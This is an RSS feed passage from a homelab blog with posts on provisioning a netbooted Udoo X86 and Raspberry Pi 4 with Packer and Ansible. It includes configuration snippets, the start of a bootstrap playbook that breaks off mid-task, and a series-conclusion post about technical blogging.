<code>/casper</code> directory on the Ubuntu disk. This directory actually contains a lot
of squashfs files for different host architectures and setups. And squashfs are
not very small. Then it hit me: I had only configured about 1024 MB RAM for the
VM. And the initramfs is always placed in a ramdisk. So I was simply running out
of RAM when the VM was trying to unpack the initramfs.</p>
<p>Once I increased the VM RAM to 4096 MB the problem disappeared and the boot/install
went through without a problem.</p>
<h3 id="provisioning-with-ansible">Provisioning with Ansible</h3>
<p>The provisioning part is similar to the previous provisioning for the Pis,
described <a href="https://blog.mei-home.net/posts/rpi-netboot/image/">here</a>. I&rsquo;m using Ansible.</p>
<p>In contrast to the Pi image, the provisioning here is happening against a fully
running QEMU VM. The provisioner part of the Packer file looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">build</span> {
</span></span><span style="display:flex;"><span>  sources <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;source.qemu.ubuntu-generic&#34;</span>]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">provisioner</span> <span style="color:#e6db74">&#34;ansible&#34;</span> {
</span></span><span style="display:flex;"><span>    user <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ubuntu&#34;</span>
</span></span><span style="display:flex;"><span>    extra_arguments <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;foobar_pw<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">foobar-pw</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_hostname<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">var</span>.<span style="color:#960050;background-color:#1e0010">hn_hostname</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_netboot<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">var</span>.<span style="color:#960050;background-color:#1e0010">hn_netboot</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_ceph_key<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">hn_ceph_key</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_host_id<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">var</span>.<span style="color:#960050;background-color:#1e0010">hn_host_id</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;ansible_become_password<span style="color:#f92672">=</span><span style="color:#66d9ef">ubuntu</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#e6db74">&#34;--become&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#e6db74">&#34;-v&#34;</span>
</span></span><span style="display:flex;"><span>    ]
</span></span><span style="display:flex;"><span>    ansible_ssh_extra_args <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>      &#34;-o IdentitiesOnly<span style="color:#f92672">=</span><span style="color:#66d9ef">yes</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34; -o HostkeyAlgorithms<span style="color:#f92672">=</span><span style="color:#960050;background-color:#1e0010">+</span><span style="color:#66d9ef">ssh</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">rsa</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34; -o PubkeyAcceptedAlgorithms<span style="color:#f92672">=</span><span style="color:#960050;background-color:#1e0010">+</span><span style="color:#66d9ef">ssh</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">rsa</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>    ]
</span></span><span style="display:flex;"><span>    playbook_file <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${path.root}/../bootstrap-ubuntu-image.yml&#34;</span>
</span></span><span style="display:flex;"><span>    use_sftp <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>There were several problems when I was launching the provisioning. First of all,
a good tip for debugging provisioner problems: Add the command line switch
<code>-on-error=ask</code> to your Packer invocation. This means that after the build step,
if the provisioning step
fails, Packer will not stop and remove all files. Instead, you will be asked what
to do. One option is to repeat the provisioning step. This even reloads the
Ansible playbook, so you can try out multiple changes in your playbook, without
having to wait for the full Ubuntu installation again.</p>
<p>The first problem I hit was that any file transfer, e.g. use of the <code>copy</code> module,
did not work at all. The only thing working was the <code>raw</code> module, because that
is not actually a Python module that needs to be copied, but just runs the
command given.
I must admit that I still do not know what the actual problem was. In the end,
I just had to add the option <code>use_sftp</code>. This makes use of SFTP for copying
files instead of SCP.</p>
<p>Another hurdle was the deprecation of the <code>ssh-rsa</code> algorithm from OpenSSH
recently. Quite frankly, I don&rsquo;t know what is creating the problem here.
Both, on Ubuntu and on the machine I was executing Packer on, OpenSSH is
very current. The only thing I can imagine: The QEMU builder says that it uses
a SSH proxy to connect the local host with the VM. It&rsquo;s possible that this SSH
proxy does not support the new algorithm yet. Or the problem might simply be
the SSH key generated by the QEMU builder. I did not dig too deep into this
problem and just added the <code>-o HostKeyAlgorithms=+ssh-rsa</code> and
<code>-o PubkeyAcceptedAlgorithms=+ssh-rsa</code> options to the extra Ansible SSH args.</p>
<p>And that&rsquo;s it. Now the only thing remaining is the deployment. For that, I
execute the Packer build. Then, I take the resulting image and put it onto a
newly created 50 GB Ceph RBD volume. In addition, I&rsquo;ve got a small playbook
which generates the necessary Syslinux configuration and puts it onto my
netboot server, together with the Kernel and initramfs from <code>/boot</code>.
Now I just need to boot the Udoo et voila, I&rsquo;ve got a fully
diskless Udoo with Ubuntu Server running, with my internal Ansible user already
created and ready for the execution of my full deployment playbook.</p>
<p>As mentioned in the introduction, the Udoo serves as a Nomad cluster node. It is
doing its job pretty well and has not made any problems in the about 10 days I
have had it deployed.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Netboot Raspberry Pi Part VI: Conclusion</title>
      <link>https://blog.mei-home.net/posts/rpi-netboot/conclusion/</link>
      <pubDate>Sun, 25 Sep 2022 12:10:00 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/rpi-netboot/conclusion/</guid>
      <description>A short conclusion for the Netboot Pi series and blogging in general</description>
      <content:encoded><![CDATA[<p>Finally, the <a href="https://blog.mei-home.net/posts/rpi-netboot/intro/">Netboot Raspberry Pi series</a>
concludes with this post. I will be going over both, what figuring out the actual
netboot and blogging about it was like.</p>
<p>If you&rsquo;ve followed this series, I&rsquo;m hoping that you&rsquo;ve learned a lot more than
&ldquo;just&rdquo; how to produce an image that can netboot a Raspberry Pi 4. For me, the
information on the side, like how the initramfs works in the Linux boot process,
was more interesting than then netboot itself.</p>
<p>If I ever need to do something
else than using a Ceph RBD as my root device, I already know that it&rsquo;s not more
difficult than writing a bit of Bash scripting.</p>
<p>This netbooting Pi setup was the trigger for me to finally get into blogging.
There were a couple of comments in the Turing Pi 2 community about how netbooting
Pis always felt a little bit like weaving a couple of arcane incantations and
suddenly it worked. When I finally figured out how it all fit together, I wanted
to share that knowledge, but Discord is not exactly the right place for long form
content. So I decided to finally get started with technical blogging. That it
was another thing I could self-host also helped. &#x1f609;</p>
<p>And I like it. Writing these articles was interesting and fun. I&rsquo;ve got a lot of
experience with technical writing, e.g. for JIRA tickets at work. I really would
have liked for somebody to tell me beforehand that becoming a technical lead would
mean I would become more familiar with whatever Atlassian calls their JIRA markup
language than any actual programming language. &#x1f605;
But with these blog posts, writing felt a lot more relaxed. There was no pressure
to get the posts written until a future deadline so that they could be groomed
in time for the next sprint. There was no need to take into account the possibility
that total newcomers would get the tickets and need an explanation of absolutely
everything.</p>
<p>But there was one thing which was nagging me: I&rsquo;ve done a CS degree at university.
And while that included a lot of writing, it was that special beast that is
academic writing. Not the style I wanted to go for with this blog. So is there
some sort of &ldquo;tech blogger style guide&rdquo;? Something more substantial than &ldquo;Here are
12 points each blogger should heed&rdquo;? Some good book perhaps, on technical writing?
I would be grateful for any and all pointers.</p>
<p>And I definitely need help in this area. I&rsquo;ve not been thinking a lot about style
in these posts, but I have already realized I committed some no-goes. For example,
I&rsquo;m often switching between &ldquo;Next, I will&hellip;&rdquo;, &ldquo;Next we should&hellip;&rdquo;, &ldquo;Next you
should&hellip;&rdquo; in one and the same article. If I remember correctly, this is a bad
thing. I&rsquo;m hoping this hasn&rsquo;t grated too much on my readers up to this point.</p>
<p>So what to expect in the future? I will definitely keep the blog up. As said
above, writing is fun. I will be continuing with these tutorial style posts
about things I&rsquo;m doing in my homelab.</p>
<p>One important goal: Write posts about things right after I have finished them.
I&rsquo;ve already got a list of articles I want to write about things I have set up
in the homelab since I started the netbooting Pi series, but did not start yet
because I forced myself to first finish this series. I believe it is going to be
more fun to write a blog article right after I have finished implementing
something new, instead of keeping a long list of potential articles and writing
them months after the fact.</p>
<p>One article I have already started is about the <a href="https://shop.udoo.org/en/udoo-x86-ii-ultra.html">Udoo X86 II Ultra</a> I set up last weekend. This machine is also netbooted, but in contrast to
the Pi, it has a more &ldquo;standard&rdquo; PXE boot. I also had to go a different route
when preparing the Packer image, so I think it will make for an interesting
article.</p>
<p>Then I will follow up with some more generic pieces on my homelab. First, on
the setup I&rsquo;m currently running with, and then also one on the 10 year history
of my homelab. I want to describe each stage of my homelab, why I made those
decisions at the time, and what worked there and what did not.</p>
<p>Finally, a request: If you&rsquo;ve been reading a couple of posts in this series,
shoot me a short comment, for example on <a href="https://twitter.com/michael_mmeier">Twitter</a>
or, preferably, <a href="https://social.mei-home.net/@mmeier">Mastodon</a>. I am especially
interested in comments on style.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Netboot Raspberry Pi Part V: Ansible Playbook</title>
      <link>https://blog.mei-home.net/posts/rpi-netboot/playbook/</link>
      <pubDate>Sun, 25 Sep 2022 01:12:00 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/rpi-netboot/playbook/</guid>
      <description>Using an Ansible Playbook for Packer provisioning of a netbooting Pi 4</description>
      <content:encoded><![CDATA[<p>This is the fifth part of my Raspberry Pi netboot series. The introduction with
an overview and links to previous articles can be found <a href="https://blog.mei-home.net/posts/rpi-netboot/intro/">here</a>.</p>
<p>In this post, we will go over the Ansible playbook I use to provision my Pis.
This playbook&rsquo;s intention is not to fully provision the Pi for use, e.g. it will
not set up Nomad or Ceph. It will only prepare the image to netboot and set up
my normal Ansible user for my main provisioning Ansible playbooks, to be executed
after first boot.</p>
<p>In the playbook, I&rsquo;m using a couple of files for setting up the initramfs for
mounting a Ceph RBD volume. The approach was taken from <a href="https://github.com/ltsp/ltsp/pull/50">this PR</a>
and slightly adapted. A full description of those file&rsquo;s contents can be found
in <a href="https://blog.mei-home.net/posts/rpi-netboot/initramfs/">Part III</a> of the series.
These files can be found in <a href="https://gist.github.com/mmeier86/97d8d55073ebcd4c832d7cc8a76241e7">this gist on GitHub</a> for ease of copying.</p>
<h1 id="caveats">Caveats</h1>
<p>There are a couple of caveats when using Packer and the <a href="https://github.com/mkaczanowski/packer-builder-arm">packer-builder-arm</a> builder.
This is due to the fact that the builder does not launch a full VM, but merely
mounts the image and the chroots into it. This means that things like checking
the running kernel version or the system architecture with standard Ansible
facts will not be working, due to the fact that the kernel Ansible sees is the
one from the host you are running Packer on, not the one of the actual host
you are provisioning.
This is why there is a <code>hn_pi</code> variable used throughout the playbook, to identify
whether we are preparing an image for a Pi or a more standard host.</p>
<h1 id="how-its-invoked">How it&rsquo;s invoked</h1>
<p>To reiterate from my <a href="https://blog.mei-home.net/posts/rpi-netboot/image/">previous article</a>
on the Packer setup, this is how the <a href="https://www.packer.io/plugins/provisioners/ansible/ansible">Ansible provisioner</a>
is configured:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span>  <span style="color:#66d9ef">provisioner</span> <span style="color:#e6db74">&#34;ansible&#34;</span> {
</span></span><span style="display:flex;"><span>    extra_arguments <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>      &#34;--connection<span style="color:#f92672">=</span><span style="color:#66d9ef">chroot</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--inventory-file<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">mountpath</span><span style="color:#e6db74">}</span>,<span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--limit<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">mountpath</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;foobar_pw<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">foobar-pw</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_hostname<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">var</span>.<span style="color:#960050;background-color:#1e0010">hn_hostname</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_netboot<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">var</span>.<span style="color:#960050;background-color:#1e0010">hn_netboot</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_host_id<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">var</span>.<span style="color:#960050;background-color:#1e0010">hn_host_id</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_ceph_key<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">hn_ceph_key</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_pi<span style="color:#f92672">=</span><span style="color:#66d9ef">true</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#e6db74">&#34;--user&#34;, &#34;ubuntu&#34;</span>,
</span></span><span style="display:flex;"><span>    ]
</span></span><span style="display:flex;"><span>    playbook_file <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${path.root}/../bootstrap-ubuntu-image.yml&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span></code></pre></div><p>Note especially the <code>connection=chroot</code> option, which tells Ansible to use chroot
instead of the default SSH connection. This is required when using packer-builder-arm
because that builder makes use of chroot instead of launching a VM.</p>
<h1 id="the-playbook">The playbook</h1>
<p>Here is the playbook itself:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">hosts</span>: <span style="color:#ae81ff">all</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Bootstrap python for ansible</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">gather_facts</span>: <span style="color:#66d9ef">no</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">pre_tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">install ansible dependencies</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">bootstrap</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">raw</span>: <span style="color:#ae81ff">apt -y install python3 sudo</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">hosts</span>: <span style="color:#ae81ff">all</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">setup host</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">create user foobar</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">foobar</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">ansible</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">user</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">foobar</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">create_home</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">shell</span>: <span style="color:#ae81ff">/bin/bash</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">groups</span>: <span style="color:#e6db74">&#39;&#39;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">configure SSH key for foobar</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">foobar</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">ansible</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">authorized_key</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">user</span>: <span style="color:#ae81ff">foobar</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">exclusive</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;{{ lookup(&#39;file&#39;,&#39;ansible.pub&#39;) }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key_options</span>: <span style="color:#e6db74">&#39;{% if ansible_hostname != &#34;candc&#34; %}from=&#34;10.0.0.200&#34;{% else %}from=&#34;127.0.0.1&#34;{% endif %}&#39;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">add foobar to sudoers file</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">foobar</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">ansible</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/etc/sudoers.d/foobar</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">content</span>: <span style="color:#e6db74">&#34;foobar ALL=(ALL:ALL) ALL&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">mode</span>: <span style="color:#ae81ff">0440</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">validate</span>: <span style="color:#e6db74">&#39;visudo -cf %s&#39;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">set foobar password</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">bootstrap</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">user</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">foobar</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">password</span>: <span style="color:#e6db74">&#34;{{ foobar_pw | password_hash(&#39;sha512&#39;) }}&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">set hostname in /etc/hostname</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">bootstrap</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">replace</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/etc/hostname</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regexp</span>: <span style="color:#e6db74">&#39;^ubuntu$&#39;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">replace</span>: <span style="color:#e6db74">&#39;{{ hn_hostname }}&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">set hostname in /etc/hosts</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">bootstrap</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">replace</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/etc/hosts</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regexp</span>: <span style="color:#e6db74">&#39;^127\.0\.0\.1 localhost&#39;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">replace</span>: <span style="color:#e6db74">&#39;127.0.0.1 localhost {{ hn_hostname }} {{ hn_hostname }}.home&#39;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">remove quiet setting from kernel command line</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">bootstrap</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">replace</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/boot/firmware/cmdline.txt</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regexp</span>: <span style="color:#e6db74">&#39;(.*) quiet (.*)&#39;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">replace</span>: <span style="color:#e6db74">&#39;\1 \2&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">remove splash setting from kernel command line</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">bootstrap</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">replace</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/boot/firmware/cmdline.txt</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regexp</span>: <span style="color:#e6db74">&#39;(.*) splash(.*)&#39;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">replace</span>: <span style="color:#e6db74">&#39;\1 \2&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># with lz4 compression (default in Pi images), something goes wrong with</span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># compression, and some files seem to be corrupted when unpacked during boot.</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">switch initrd compression to gzip</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">ubuntu</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">lineinfile</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/etc/initramfs-tools/conf.d/raspi-lz4.conf</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">line</span>: <span style="color:#e6db74">&#34;COMPRESS=gzip&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regexp</span>: <span style="color:#e6db74">&#34;^COMPRESS=lz4$&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#39;644&#39;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">create</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Prevent automatic backups of files in /boot/firmware</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">ubuntu</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">lineinfile</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/etc/default/flash-kernel</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">line</span>: <span style="color:#e6db74">&#34;NO_CREATE_DOT_BAK_FILES=yes&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_pi is defined</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">hosts</span>: <span style="color:#ae81ff">all</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">setup netboot</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Remove /boot/firmware dependency for cloud-init-local service</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">file</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/etc/systemd/system/cloud-init-local.service.d/mount-seed.conf</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">absent</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; </span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">create directory for rpi eeprom service file dropin</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">file</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/etc/systemd/system/rpi-eeprom-update.service.d</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">directory</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">add dependency on boot/firmware mount for rpi eeprom service</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
